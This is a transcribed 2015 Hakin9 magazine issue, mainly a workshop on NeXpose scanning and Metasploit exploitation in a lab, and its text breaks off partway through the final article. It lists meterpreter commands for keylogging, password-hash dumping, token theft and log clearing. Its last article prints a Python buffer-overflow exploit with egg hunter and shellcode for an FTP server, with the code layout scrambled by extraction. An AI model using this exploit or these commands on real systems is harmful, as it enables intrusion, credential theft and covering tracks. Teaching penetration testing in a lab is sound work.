Hakin9 - ISO Interactive

Transcription

Cyber Security Auditing Software
Improve your
Firewall Auditing
As a penetration tester you have to be an expert in multiple
technologies. Typically you are auditing systems installed and
maintained by experienced people, often protective of their own
methods and technologies. On any particular assessment testers may
have to perform an analysis of Windows systems, UNIX systems, web
applications, databases, wireless networking and a variety of network
protocols and firewall devices. Any security issues identified within
those technologies will then have to be explained in a way that both
management and system maintainers can understand.
he network scanning phase of a
penetration assessment will quickly
identify a number of security
weaknesses and services running on the
scanned systems. This enables a tester to
quickly focus on potentially vulnerable
systems and services using a variety of tools
that are designed to probe and examine
them in more detail e.g. web service query
tools. However this is only part of the picture
and a more thorough analysis of most
systems will involve having administrative
access in order to examine in detail how
they have been configured. In the case of
firewalls, switches, routers and other
infrastructure devices this could mean
manually reviewing the configuration files
saved from a wide variety of devices.
Although various tools exist that can
examine some elements of a configuration,
the assessment would typically end up
being a largely manual process. Nipper
Studio is a tool that enables penetration
testers, and non-security professionals, to
quickly perform a detailed analysis of
network infrastructure devices. Nipper
Studio does this by examining the actual
configuration of the device, enabling a much
more comprehensive and precise audit than
a scanner could ever achieve.
www.titania.com
NeXpose and Metasploit Pro Hacking
Copyright © 2015 Hakin9 Media Sp. z o.o. SK
Table of Contents
07
11
21
31
49
74
80
by Raheel Ahmad
Metasploit Pro Professional Use
by Raheel Ahmad
NeXpose and Metasploit Lab
by Raheel Ahmad
Hacking with NeXpose and Metasploit
by Raheel Ahmad
Basecamp – Project Management for the Sane
by Troy Hipolito
Tackling SYN Flood attacks
by Ratan Jyoti
Implementation Of Transparent Data Encryption (Tde) And Additional
Compensational Controls As Alternative Method Regarding Encryption
Of Pan Numbers In Microsoft Sql Database (Pci Dss V3.0, Section 3.4)
by Darko Mihajlovski, Kiril Buhov, Jani Nikolov
86
88
90
92
94
Hacking Journalists
by Bob Monroe
Offended by Offensive Security
by Bob Monroe
Shouting at the Security Waves
by Bob Monroe
RGB LED Lighting Shield with XMC1202 for Arduino
by Bob Monroe
Security in Computing by Charles P. Pfleeger, Shari Lawrence Pfleeger
ad Jonathan Mrgulies
by Bob Monroe
4
Dear Readers,
T
his new issue of Hakin9 Magazine is coming out today. I hope that my words find you
well and in a happy mood. I hope that you will find many interesting articles inside the
magazine and that you will have time to read all of them. All comments are welcome.
We collected the articles written by experts in their field to provide you with highest-quality
knowledge. Enjoy your reading and develop your new skills with our magazine!
Inside this Hakin9 issue, we publish articles that will present security knowledge. If you
want to find out more about penetration testing, you should read them all. We would like to
highlight the articles on Nexpose and Metasploit.
Also, we recommend that you read Darko Mihajlovski’s article. “Proper” TDE
implementation should cover the 3.4 requirement from PCIDSS v3, where it demands the
following: Render PAN unreadable anywhere it is stored (including on portable digital media,
backup media, and in logs) by using any of the following approaches:
• One-way hashes based on strong cryptography (hash must be of the entire PAN)
• Truncation (hashing cannot be used to replace the truncated segment of PAN)
• Index tokens and pads (pads must be securely stored)
• Strong cryptography with associated key-management processes and procedures.
Of course, please do not forget to read the other articles. I would like to mention that as long
as we have our precious readers, we have a purpose. We owe you a huge THANK YOU. We
are grateful for every comment and opinion, either positive or negative. Every word from you
lets us improve Hakin9 magazine and brings us closer to the ideal shape of our publication.
Thank you.
Ewa & Hakin9 team
5
Editor in Chief: Ewa Dudzic
[email protected]
Editorial Advisory Board: David Kosorok, Matias N.
Sliafertas, Gyndine, Gilles Lami, Amit Chugh, Sandesh Kumar,
Trish Hullings
Special thanks to our Beta testers and Proofreaders who helped
us with this issue. Our magazine would not exist without your
assistance and expertise.
Publisher: Paweł Marciniak
CEO: Ewa Dudzic
[email protected]
Art. Director: Ireneusz Pogroszewski
[email protected]
DTP: Ireneusz Pogroszewski
Publisher: Hakin9 Media sp. z o.o. SK
02-676 Warszawa, ul. Postępu 17D
NIP 95123253396
www.hakin9.org/en
[ GEEKED AT BIRTH ]
Whilst every effort has been made to ensure the highest quality
of the magazine, the editors make no warranty, expressed
or implied, concerning the results of the content’s usage.
All trademarks presented in the magazine were used for
informative purposes only.
All rights to trademarks presented in the magazine are reserved
by the companies which own them.
DISCLAIMER!
The techniques described in our magazine may be used
in private, local networks only. The editors hold no
responsibility for the misuse of the techniques presented
or any data loss.
You can talk the talk.
Can you walk the walk?
[ IT’S IN YOUR DNA ]
LEARN:
Advancing Computer Science
Artificial Life Programming
Digital Media
Digital Video
Enterprise Software Development
Game Art and Animation
Game Design
Game Programming
Human-Computer Interaction
Network Engineering
Network Security
Open Source Technologies
Robotics and Embedded Systems
Serious Game and Simulation
Strategic Technology Development
Technology Forensics
Technology Product Design
Technology Studies
Virtual Modeling and Design
Web and Social Media Technologies
www.uat.edu > 877.UAT.GEEK
Please see www.uat.edu/fastfacts for the latest information about
degree program performance, placement and costs.
by Raheel Ahmad
Welcome to the “NeXpose and Metasploit Pro Hacking” Workshop. In this workshop, you
will learn more about NeXpose and Metasploit features, their usage and how you can best
utilize these tools in order to perform penetration testing or security assessment of your
organization.
You will be able to learn more about NeXpose, the great vulnerability assessment and management software
available in the market. In the field of security testing or penetration testing, vulnerability assessment plays
an important role in order to successfully penetrate into any network or system. To achieve this goal or
perform the tasks, you need a cutting edge vulnerability assessment tool in order to assess the security of the
target network or in other words perform vulnerability assessment.
NeXpose isn’t the only tool available in the market to perform vulnerability assessment, however, it is one
of the best among the industry leading tools in vulnerability assessment.
Basically, the vulnerability assessment leads to the exploitation phase in the ethical hacking or penetration
testing lifecycle and NeXpose gives you an edge and represents how you can exploit the discovered vulnerability.
Industry Comments: http://www.scmagazine.com/rapid7-nexpose-v55/review/3796/.
Like any other security product, NeXpose has certain requirements for its installation. You should know
in detail how you can get most out of this tool.
NeXpose Installation Requirements
Minimum Hardware
• 2 GHz+ processor
• 8 GB RAM (64 bit)
• 80 GB+ available disk space (10 GB for Community Edition)
• 10 GB+ available disk space for Scan engines
• English operating system with English/United States regional settings
• 100 Mbps network interface card
Operating Systems
64-bit versions of the following platforms are supported.
• Microsoft Windows 7, Windows 8, Server 2008 (R2), Server 2012, Server 2012 (R2)
• Red Hat Enterprise Linux 5.x, 6.x
• Ubuntu Linux 10.04 LTS, 12.04 LTS
• Kali Linux 1.0.x
• Virtualized Machines on VMware ESXi 5.x, VMware vCenter Server 4.x, VMware vCenter Server 5.
7
NeXpose Editions
NeXpose comes in a couple of different editions with the flexibility and capabilities ranging from individual
user to the ultimate level as shown in the below figure.
Details on all of these editions are available on the rapid7 official page on this link. http://www.rapid7.com/
products/nexpose/editions.jsp. Our workshops will use the consultant edition in our lab.
Why Using NeXpose?
In the overall penetration testing or ethical hacking lifecycle, “Vulnerability Assessment & Management”
is the actual phase where you discover potential vulnerabilities in the targeted network or system. There
are many tools available in order to automate this process that enable security professionals or administrators
to effectively determine the security posture of their network.
NeXpose helps in different ways to achieve this goal and provides support for performing an in-depth
vulnerability assessment. This tool is better than the other vulnerability assessment tools available in the
market. The best part is that it provides details on available exploits on exploit-db and Metasploit Framework
for the discovered vulnerabilities and creates files in the same configuration as the Metasploit Modules,
which you can use to configure Metasploit for exploitation. NeXpose has great compatibility with the
Metasploit Framework, which gives it another edge in the industry and an advantage for security testers.
NeXpose also comes in a standalone virtual box that you can integrate into your virtual servers as a separate
deployment. NeXpose scan engine and its security console gives another edge for its performance and
better reliability. You will further explore this tool’s features in the workshop and a complete walkthrough
of its usage.
NeXpose Components
NeXpose architecture is distributed into two main components; this includes a central server, and one
or more scanning engines. The central server is called the NSC (NeXpose Security Console) and the scan
engine is called NSE (NeXpose Scan Engine). The main purpose of a central server is to run a Web server
process in order to provide access to its users and connect with a backend database for information storage
and a scan engine to scan assets.
Additional scan engines can be placed similarly within the network to originate scanning under the control
of the NSC. This is a distributed architecture with scan engines and servers communicating over a secure
connection.
If you have a NeXpose Security Console (NSC), it will perform the following operations:
• It communicates with Scan Engines to start scans, retrieve scan information, and store scan data.
• It provides a Web interface for managing all NeXpose operations.
8
• It downloads product and content updates from the Rapid7 update server.
• The Security Console Appliance also includes a local Scan Engine.
• If you have a NeXpose Scan Engine (NSE), your Appliance performs asset discovery, vulnerability
detection, and policy compliance testing. A Security Console controls it.
Vulnerability Assessment & NeXpose
In today’s war of performing vulnerability assessments with the available tools in the industry, one of the
biggest challenges for any vulnerability management program is the analysis of scan results. If you want
good verifiable and actionable results, in order to effectively remediate them, you need some solutions
for the discovered vulnerabilities, or else you can be overwhelmed with false positives which can affect the
overall vulnerability assessment process or the program.
The above NeXpose architectural model provides a design to solve this problem and have flexibility
for building a simpler vulnerability check model with a higher degree of accuracy. Vulnerability scans
with NeXpose generate real risk analysis, credible remediation plans and easy to use data management
functions. This is achieved by an extensive Vulnerability Detection which is based on proactive scanning
of systems and services; it also covers web and databases.
To provide more focused and dedicated scans, NeXpose has templates to be used for different multiple
predefined scan types and you will get the flexibility to create your own. However, the existing templates
cover a wide range of scenarios and include full/normal audit, denial-of-service, penetration testing and
database testing.
Moreover, NeXpose can also help you to identify known vulnerabilities along with the configuration
compliance issues for:
• Web sites/services
• Databases
• Network equipment
• Operating systems
• Applications
All this detection happens during the same scan and from the same scan engine, hence it makes simpler for
you to configure and to get all the information you need at one time for any usage.
Vulnerability Reporting and NeXpose
For an ethical hacker, or a professional penetration tester, the main challenge is to report what he or she
has been doing in the overall vulnerability assessment or exploitation phases or the complete ethical
hacking lifecycle execution. This requires some good presentations along with the technical details, as
well as a business related management summary so that an ethical hacker can explain what he or she has
been performing while trying to ethically hack the targeted network. To achieve these tasks when you are
finished with vulnerability scans or compliance scans, you can now assess the risk and determine what is
most important for the targeted network environment. NeXpose includes several reports which help with this
including:
• Prioritized Remediation Report
• Top 10 Vulnerability Report
• Audit Report
9
These reports conclusively cover all available patches and all known vulnerabilities in the targeted network
environment and provide a prioritized list of which remediations will have the most impact on risk in the
environment.
NeXpose also offers the flexibility to report on the assets and vulnerabilities which are important in the
targeted network environment by means of rich asset and vulnerability filtering. Such reports can be
automated from the UI or API so that as soon as a scan completes, remediation owners get the accurate
and detailed information they need to do their jobs and stakeholders can get accurate information on how
risk is changing over time. Report generation is another major factor to make this tool the best among the
best because it will not disappoint you if accuracy in report generation is of more importance than simply
dumping the report content.
In summary, NeXpose provides a detailed and in-depth vulnerability assessment and management along with
a step ahead assistance in the exploitation phase of penetration testing or ethical hacking. It is recommended
to have detailed hands-on skills if you want to stand out from others in the penetration testing field.
We hope it’s been informative for you and thank you for completing the article. In the next article, a
Metasploit in depth study will be covered and later we will explore how to work with NeXpose and
Metasploit together to perform an extensive security assessment.
About the Author
Raheel Ahmad, CISSP, CEH, CEI, MCP, MCT, CRISC, CobIT
Founder of 26Securelabs an Information Security consulting company. Raheel is an expert in information
security with 9+ years in the domain of infosec.
10
Metasploit Pro Professional Use
by Raheel Ahmad
You will be studying in depth about the Metasploit Framework. This will also help you study
the extraordinary benefits of this security tool, which also plays a key role in the exploit
development lifecycle. Metasploit is the bread and butter for many information security
professionals or pen testers.
Metasploit Framework – The Hacker’s Bread
There are a couple of good exploitation tools available in the market that are used by security professionals,
however, Metasploit leads the industry due to a couple of reasons. There are other tools available, like Core
Impact and Immunity Canvas, which lead the market along with Metasploit. The problem is that these tools
are closed source and you would not be able to find even their crack or open version from any authentic
source. Metasploit comes in a community edition, which doesn’t have any major differences in features
in comparison to the pro version of Metasploit.
Many freelancers and small companies in security consulting use this community edition of Metasploit and
the community edition is also used by many professionals who practice hacking in order to advance their
hacking skills and exploitation techniques. I personally used Metasploit from its early days and still make
a good use of this framework when I need to perform exploit research and testing in my lab.
Metasploit Architecture’s Basics
11
Metasploit framework is a modular framework; the most fundamental piece of the architecture is the Rex
library, which is short for Ruby Extension Library.The lowest level is core library and this is followed by base.
Finally, base library is extended by framework UI which implements support for the different types of user
interfaces to the framework itself, such as command line and web interface. Separate from the framework
itself are the articles and plugins that it’s designed to support. Metasploit Framework fundamentals include
the [msfcli], [msfconsole], [exploits], [payloads], [database] and the famous [meterpreter].
Metasploit is not just the exploitation tools; it has many features that will help you in exploits research
and development. Plus, you can develop your own Metasploit Modules and add the flexibility as per your
need or requirements for the dedicated pen testing projects. Fundamentals are just the tools you can use
or someone who just uses Metasploit as a click and go tool for performing pen testing or ethical hacking.
This tool is awesomely developed and helps in many different ways and is widely used by information
security professionals. This article will highlight as much as possible as this tool requires a complete
workshop on it, if you want to understand and want to become master of it. However, you will be able
to learn the maximum professional usage of this great tool in pen testing.
Metasploit Commands to Memorize
If you want to learn Metasploit and use it in your pen testing projects or for any security research and exploit
development, then there are some core commands you should understand and have hands-on experience with.
12
General Commands
? – help menu
background – moves the current session to the background
bgkill – kills a background meterpreter script
bglist – provides a list of all running background scripts
bgrun – runs a script as a background thread
channel – displays active channels
close – closes a channel
exit – terminates a meterpreter session
help – help menu
interact – interacts with a channel
irb – go into Ruby scripting mode
migrate – moves the active process to a designated PID
quit – terminates the meterpreter session
read – reads the data from a channel
run – executes the meterpreter script designated after it
use – loads a meterpreter extension
write – writes data to a channel
File System Commands
cat – read and output to stdout the contents of a file
cd – change directory on the victim
del – delete a file on the victim
download – download a file from the victim system to the attacker system
edit – edit a file with vim
getlwd – print the local directory
getwd – print working directory
lcd – change local directory
lpwd – print local directory
ls – list files in current directory
mkdir – make a directory on the victim system
pwd – print working directory
rm – delete a file
rmdir – remove directory on the victim system
upload – upload a file from the attacker system to the victim
Networking Commands
ipconfig – displays network interfaces with key information including IP address, etc.
portfwd – forwards a port on the victim system to a remote service
route – view or modify the victim routing table
System Commands
clearav – clears the event logs on the victim’s computer
drop_token – drops a stolen token
execute – executes a command
getpid – gets the current process ID (PID)
getprivs – gets as many privileges as possible
getuid – get the user that the server is running as
kill – terminate the process designated by the PID
ps – list running processes
reboot – reboots the victim computer
reg – interact with the victim’s registry
rev2self – calls RevertToSelf() on the victim machine
shell – opens a command shell on the victim machine
shutdown – shuts down the victim’s computer
steal_token – attempts to steal the token of a specified (PID) process
sysinfo – gets the details about the victim computer such as OS and name
13
User Interface Commands
enumdesktops – lists all accessible desktops
getdesktop – get the current meterpreter desktop
idletime – checks to see how long since the victim system has been idle
keyscan_dump – dumps the contents of the software keylogger
keyscan_start – starts the software keylogger when associated with a process such as Word or browser
keyscan_stop – stops the software keylogger
screenshot – grabs a screenshot of the meterpreter desktop
set_desktop – changes the meterpreter desktop
uictl – enables control of some of the user interface components
Privilege Escalation & Password Dump & Timestomp Commands
getsystem – uses 15 built-in methods to gain sysadmin privileges
hashdump – grabs the hashes in the password (SAM) file
timestomp – manipulates the modify, access, and create attributes of a file
Metasploit Professional Use
Metasploit Framework has been in the industry for a while now and it’s a first choice of security
professionals when you talk about pen testing, however, not all security professionals have hands-on
experience with Metasploit, they just use it as a tool that has the bulk of exploits available that can be
launched by anyone. This is not the professional usage of Metasploit. If you, as a security professional,
want to stand out from such professionals, then be an expert in using this great tool.
In order to have an expert level experience with Metasploit, you should have following skills developed
by using this wonderful tool:
• At first you should understand how this tool works
• Modules Information
• Exploiting and Pivoting
• Customization of Modules
• Developing a Metasploit Module
• Exploit Development with Metasploit
A couple of these skills will be covered in this module and the remaining will be explored in the last module
with hands-on testing in the workshop. Keep learning with hakin9!
Metasploit Usage
The commands presented above only cover some basics of the command line usage of this tool. You will be
able to explore more on the pro version of Metasploit. However, let’s quickly review what else you can do from
the command line. Functionality available from the command line is given below with the usage details.
14
Command Line Access
Type help and you will see core commands, some of them are shown below:
15
Other commands you can see are related to database functionality as shown below in the snapshot.
Now, you can also load different modules available in the Metasploit Framework, which works in integration
with other security tools for advanced usage and basically professionally performing pen testing via a single
command line platform of the Metasploit Framework. All the modules available by default when Metasploit
Framework runs can be found in the module directory of the Metasploit Framework. This can be different
and depends on the installation directory as well as the operating system on which you have installed the
Metasploit Framework.
On Kali Linux, you can found these modules located on the following path as shown below in the snapshot.
However, there are some more modules that you can add at run time. These modules are shown below; each
of these modules would be loaded into the run time environment by using the “load” command. You should
practice loading these modules and use them one by one. Usage details are also available from the command
and will be presented shortly here.
16
Loading Nessus Modules on Run Time
Loading NeXpose Module on Run Time
17
Loading other Modules on Run Time
Loading Famous “wmap” & “sqlmap” Modules on Run Time
Once all of these modules are loaded, you will be able to see commands, or let’s say functionality, you can
perform with these modules, like directly performing vulnerability scans from Metasploit Framework
by use of Nessus and NeXpose modules just loaded or run Web Application assessments with the help
of “SQLMAP and WMAP” modules loaded and similarly for the other modules we have just loaded.
The following snapshots show the available functionality after loading these modules.
18
Nessus features available after loading its module:
Similarly, NeXpose features are also available after its module is loaded.
After loading all of these modules, let’s look at what you will be able to perform from Metasploit Command
Line Interface:
• Nessus Vulnerability Scans
• NeXpose Vulnerability Scans
19
• Web Scans with “wmap”
• Database testing with “sqlmap”
• Exploitation
This is called a full flashed pen testing platform that gives you flexibility to run multiple tasks from a single
platform. This is the power of Metasploit and you can also develop your own module and import it into
Metasploit Framework. You will be able to explore all of these features in the upcoming modules where
you will be performing hands-on testing with these modules and developing your skills with Metasploit
Framework.
But it’s not enough at this stage, you still need to explore exploit development features available in Metasploit
which were stated earlier in the module. Exploit development features of Metasploit will be covered in last
module.In our opinion, Metasploit provides efficient use from the command line and, as a security professional,
you should be an expert with the command line and that’s what the industry considered however it is not the
rule! Hackers like “shell”. Keep learning with hakin9! We have more for you to learn and hack!
About the Author
20
NeXpose and Metasploit Lab
by Raheel Ahmad
You will be learning “how to setup” one box with multiple core hacking tools which can
help you perform ethical hacking or pen testing. You can perform customization on these
tools and get them ready for your quick usage. However, it will require a suitable hardware
requirement so that you can run these tools together.
You should be able to download and get the keys for other than the community editions of NeXpose
and Metasploit Framework, however, if you only have community versions then it doesn’t make much
of a difference in learning but it’s better to use professional versions, if possible.
Hardware Requirements
NeXpose hardware requirements have already been presented in the previous article and Metasploit doesn’t
require more than what NeXpose needs to run on a standalone machine.
However, do ensure that you meet the recommended requirements if you don’t want hiccups at the time
of performing vulnerability scans on a large pool of addresses or exploitation analysis on different bugs.
The faster your machine is, the better your performance, and better output.
Choosing Operating System Platform
NeXpose and Metasploit framework now support multiple operating system platforms on which you can
install these tools, however, security professionals’ preferences and the performance capabilities varies from
OS to OS.
Operating Systems Supported by NeXpose
64-bit versions of the following platforms are supported.
• Microsoft Windows 7, Windows 8, Server 2008 (R2), Server 2012, Server 2012 (R2)
• Red Hat Enterprise Linux 5.x, 6.x
• Ubuntu Linux 10.04 LTS, 12.04 LTS
• Kali Linux 1.0.x
• Virtualized Machines on VMware ESXi 5.x, VMware vCenter Server 4.x, VMware vCenter Server 5.x
Operating Systems Supported by Metasploit
• Windows Vista, Windows 7, Windows 8.x, Server 2003, Server 2008 and Server 2012 (64 bit
recommended)
• Red Hat Enterprise Linux 5.x, 6.x (x86 and x86_64)
• Ubuntu Linux 10.04, 12.04, 14.04 (x86 and x86_64)
• Kali Linux 1.0 (Metasploit pre-installed; supported on i386 and AMD64 only)
21
For this workshop, we initially thought to use Ubuntu Platform for running these tools on a single operating
system but then later shifted to Kali Linux as it comes with a preinstalled version of Metasploit that you just
need to update and we will only be installing NeXpose as a standalone installation to complete our lab for
this workshop. Moreover, we will be able to quickly add different modules to Metasploit that we studied in
the previous module. So for a couple of these reasons, our preference went towards Kali Linux and no doubt
that Kali will give support in the overall ethical hacking cycle which other operating systems would lack.
Kali Linux
You need to be good in Kali Linux if you want to become good in hacking, as Kali Linux now has become
de-facto standard in ethical hacking and pen testing. You can easily download this OS from kali.org website
and you can find out how to setup a virtual machine for Kali Linux on different hakin9 workshops too, so we
will not be covering it here. However, this module will cover customization of Kali Linux before you move
on to setting up this lab. If you are a student or a freelancer, then a virtual environment is the best fit for you,
however, performance is much better if dedicated hardware is used for this purpose.
Setup Your NeXpose and Metasploit Box
Login to the Kali Linux console and download NeXpose into Kali Linux. Once NeXpose is available for
installation, continue to the first setup requirements for Metasploit to run smoothly, as you have just freshly
installed the Kali Linux. Follow the guidelines below as shown in snapshots and command line.
Login to the Kali Console and run the following commands as shown in the below snapshots in order
to setup Metasploit smoothly.
Configuring “postgresql” and “Metasploit” to run as a service on boot time as shown below:
22
Starting database and Metasploit service to configure the first time configuration as shown below:
Type commands to run Metasploit from command line as shown below. It will take some time to configure
the required database and configurations as shown in the snapshot. Once configuration is complete, you will
be able to see the console as shown below:
23
Since it is a fresh installation, it is nice to update your Metasploit Framework, as shown below, by simply
typing “msfupdate” command.
Good, you can see that our fresh installation of Kali Linux is now getting Metasploit updates. After updating
the Metasploit Framework, you need to verify how many exploits and payloads or auxiliary modules it has
downloaded. After finishing the download and upgrade process, you will notice a change in numbers for
exploits, payloads, etc.
24
Cool, now you can upgrade to the professional version of Metasploit by launching the “go pro” command
from its console. However, it would require you to have the same licensing requirements. You can complete
the workshop with community version of Metasploit and NeXpose without hiccups.
Setting up Metasploit Console for other functionalities
Now it’s time to slightly twist your Metasploit copy by enabling plugins; this is simply loading the modules
available in the Metasploit Framework as explained in the previous module. You should be able to load
modules including all those modules explained.
You should practice these modules, especially “Nessus”, “NeXpose”, “wmap”, “sqlmap” and “openvas”
modules so that you cover all security tools integration available in Metasploit Framework.
Now, your Metasploit is ready and running with integration of these security tools and you can run scans
by using all those tools and use their scan results to perform exploitation analysis.
25
Now, you should move to the NeXpose Installation, download it from the rapid7 website from Kali Linux
as shown in below snapshots sequentially.
Now run a command line shell and make it an executable file as shown below in the snapshot by using
the same commands. We have taken the snapshot while installing it on Kali Linux as shown below in the
snapshots sequentially.
26
27
If everything goes fine in your installation, you should be able to successfully install NeXpose on Kali Linux
as shown below in the snapshot.
28
After finishing the installation, browse the link shown in the above windows and enter your product license
key for registering this fresh copy of your NeXpose installation.
Activate NeXpose
29
This will take a bit of time and then NeXpose will initialize. This completes your lab setup for setting
up Metasploit and NeXpose both in one box on Kali Linux Platform.
We hope this has been informative for you and thank you for completing the module. In the next module,
you will be able to conduct scans and exploitation to perform hacking with Metasploit and NeXpose.
About the Author
30
Hacking with NeXpose and Metasploit
by Raheel Ahmad
So, now you will learn about how to utilize these tools for hacking purposes.
Quick Facts on Hacking Methodology
Hacking methodology basically needs a detailed explanation and for this you need a separate workshop
to put light on this detailed and very technical topic. However, for your better understanding, this article
will cover the core of the hacking methodology used by hackers mostly in ethical hacking and/or penetration
testing projects.
Hacking Methodology
The key steps in the hacking methodology are outlined below in sequential order and forms the base
for the core hacking attempts.
Live System Scans
This is basically the information gathering phase in which you will be identifying the live hosts
in the targeted network of the organization.
How would this be achieved?
Answer: This is achieved by means of using scanning tools as an active information gathering technique.
You will be using Metasploit Framework only to complete this phase as we have all sets of the required
modules of Metasploit framework to run from console only.
Ports and Services Scanning
The second step is identifying the operating system of the hosts, which were discovered during the previous
step. This is necessary to know more about the hosted machine. This could be a network device or a database
server or it could be a Windows or Linux machine. Once you have the operating system type discovered, the
next step is to find the open ports and the services hosted by these host machines.
However, the above two key steps can be performed in parallel by use of scanning tools.
Answer: This will be achieved by means of scanning tools that are available in Metasploit Framework
and a module or by using scanning tools for which you have added modules on run time which we have
discussed in detail in previous modules.
Vulnerability Scanning
Vulnerability assessment is the actual phase where you will be discovering potential vulnerabilities in the
network.There are many tools available to automate this process.But, ideally, you cannot directly jump
to discover vulnerabilities.
31
Answer: This will be achieved by use of tools like NeXpose, Nessus and many more available in the market.
Metasploit plays a key role here, as well, where you have enabled Metasploit Framework to use NeXpose
and Nessus as vulnerability scanners after enabling integration of these scanners with Metasploit Framework.
Exploitation
Once you have performed all of these tasks then the actual time for hacking into any network or systems
comes into play where you will exploit the vulnerability and then gain access to the victim or exploited
machine. This is called exploitation of vulnerabilities.
Answer: This will be achieved by use of Metasploit Framework, if the exploit for this vulnerability is
available in the Metasploit.
What if the exploit is not available in Metasploit Framework?
Answer: Then if you are a security professional and know how to use Metasploit for performing exploit
development, you should develop the exploit by using Metasploit or other tools and then develop the
Metasploit Module for your discovered vulnerability. Once you have this, add this newly developed module
into Metasploit Framework
Real Time Hacking
Now you should have the virtual lab ready at this stage to perform the hacking attempts and the module
development for Metasploit Framework for your own discovered vulnerability.
Lab Design
You should have a couple of Virtual Machines running in your virtual lab and we recommend that you setup
a vulnerable machine created by rapid7; it is called Metasploitable and available for free on their website.
For this module, we will be using victim machines running the following operating systems:
• Metasploitable Linux
• Ubuntu OS
• Windows XP
• Windows 2008
Kali Linux will be our hacking platform as we have configured in the previous module with NeXpose
and Metasploit.
We will perform hacking with the tools mentioned in this workshop and would like to cover as much
as possible, virtually.
32
Information Gathering
Metasploit Console
Running information gathering via Metasploit Framework by performing port scanning by using “nmap”.
To perform this scan, first check database connectivity as shown below:
33
Now run the “nmap” scan by using the command “db_nmap” so that the scan results are saved in Metasploit
Database.
As we have launched the full scan so that we can discover all the required information including ports,
service and operating systems running, it will take a bit of time. You can see the snapshot below where
“nmap” is busy performing vulnerability scans by using scripting engine.
34
Once “nmap” finishes the scan, you should be able to see the results in the database by using commands
as shown in the below snapshot.
You should be able to discover all the hosts in the network range provided for the scan and detecting
operating systems. In order to see the ports and services running on these hosts, you should run the
“services” command to see such details as shown below in the snapshot.
At this stage of our hacking attempt we have all the information including:
• Live Systems
• Operating System Information
• Open Ports
• Services Running
• Service Versions
What you need now is vulnerability discovery. For this you should use NeXpose as a vulnerability scanner
to perform this activity. You can run NeXpose scan by simply running the scan from the command line
of Metasploit, as well as by using the web portal of NeXpose. This module will cover both methods.
35
NeXpose Scan from Metasploit Console
Load NeXpose module and then see the available commands as shown below
NeXpose Connection
First you should establish connectivity with NeXpose scanner by using “nexpose_connect” command.
Once connected, you can also check details of the system running NeXpose as shown below. This is useful
when you have multiple scanners.
36
You can now execute a scan against the hosts discovered by the “nmap” scan you performed. NeXpose will
run the vulnerability scan against those hosts by using the commands as shown below.
You can use the options as shown in the above snapshot. In the lab for this module, the scan was launched
with the following options; you can also see the output of the scan in the below snapshot:
NeXpose is busy running the scan, now let’s login via web portal and see it there also. Login with the
credentials you used during the NeXpose installation as covered in previous modules.
The scan launched via Metasploit Console is now seen in the above snapshot as logged via web access.
Further information of the scan is also shown below.
37
Once the scan is finished, you should be able to see the results in the vulnerability section as shown below.
You can see the same results via the command line of Metasploit but results would be in raw format
as shown in the below snapshot by using “vulns” command.
38
We used the search switch to look for all “mysql” vulnerabilities which were discovered in this scan.
So far in this module, you have practiced the “Ethical Hacking” methodology that you studied earlier, now
it’s time to complete the hacking attempts by exploiting the vulnerabilities. This workshop will exploit
selected vulnerabilities; you should review the report and discovered vulnerabilities in detail to gain more
knowledge and understanding of the ethical hacking lifecycle.
Exploiting Vulnerabilities
Among the discovered vulnerabilities for this exercise, the selected vulnerabilities are as follows.
1. Ability FTP Server on Windows
2. Apache on Linux
As shown in the above snapshot, a NeXpose scan was launched again separately for Windows Machine
and scan results are shown below. Among the discovered vulnerabilities, the Golden FTP bug was selected
to demonstrate the exploitation in order to hack into the Windows machine.
Hacking into Windows Machine
We exploited the Ability FTP Server with our own written exploit by using Python scripting, and if you want
to learn more on this, please complete the workshop “Advanced Exploitation Techniques”. Below is the
exploit code we have written. Shortly you will learn how you can develop your own module of this exploit
for Metasploit Framework.
39
import socket
import struct
# junk data equal in size as of offset detected at 968 bytes after which EIP is overwritten
junk = „\x41” * 1000
# we subtracted 32 bytes from original offset as we will be adding up our egg_hunter code which
is 32 bytes
junk1 = ‚\x41’ * 936
#nops to clean up any garbage values in stack -- this is called padding and it’s very effective
nops = „\x90” * 26
# egg hunter created with mona.py with tag w00t
egg_hunter =
„\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74”
egg_hunter += „\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7”
#stack address to jump
retaddress = „\x99\xC0\x96\x7C”
#Stage 2 shellcode which is actually larger shellcode to be executed by our egg hunter code
buf
buf
buf
buf
buf
buf
buf
buf
buf
buf
buf
buf
buf
buf
buf
buf
buf
buf
buf
buf
buf
buf
buf
buf
buf
buf
buf
buf
buf
buf
=
+=
+=
+=
+=
+=
+=
+=
+=
+=
+=
+=
+=
+=
+=
+=
+=
+=
+=
+=
+=
+=
+=
+=
+=
+=
+=
+=
+=
+=
„”
„\xdb\xdc\xd9\x74\x24\xf4\xba\xda\x88\x04\xa1\x5e\x2b”
„\xc9\xb1\x56\x31\x56\x18\x03\x56\x18\x83\xc6\xde\x6a”
„\xf1\x5d\x36\xe3\xfa\x9d\xc6\x94\x73\x78\xf7\x86\xe0”
„\x08\xa5\x16\x62\x5c\x45\xdc\x26\x75\xde\x90\xee\x7a”
„\x57\x1e\xc9\xb5\x68\xae\xd5\x1a\xaa\xb0\xa9\x60\xfe”
„\x12\x93\xaa\xf3\x53\xd4\xd7\xfb\x06\x8d\x9c\xa9\xb6”
„\xba\xe1\x71\xb6\x6c\x6e\xc9\xc0\x09\xb1\xbd\x7a\x13”
„\xe2\x6d\xf0\x5b\x1a\x06\x5e\x7c\x1b\xcb\xbc\x40\x52”
„\x60\x76\x32\x65\xa0\x46\xbb\x57\x8c\x05\x82\x57\x01”
„\x57\xc2\x50\xf9\x22\x38\xa3\x84\x34\xfb\xd9\x52\xb0”
„\x1e\x79\x11\x62\xfb\x7b\xf6\xf5\x88\x70\xb3\x72\xd6”
„\x94\x42\x56\x6c\xa0\xcf\x59\xa3\x20\x8b\x7d\x67\x68”
„\x48\x1f\x3e\xd4\x3f\x20\x20\xb0\xe0\x84\x2a\x53\xf5”
„\xbf\x70\x3c\x3a\xf2\x8a\xbc\x54\x85\xf9\x8e\xfb\x3d”
„\x96\xa2\x74\x98\x61\xc4\xaf\x5c\xfd\x3b\x4f\x9d\xd7”
„\xff\x1b\xcd\x4f\x29\x23\x86\x8f\xd6\xf6\x09\xc0\x78”
„\xa8\xe9\xb0\x38\x18\x82\xda\xb6\x47\xb2\xe4\x1c\xfe”
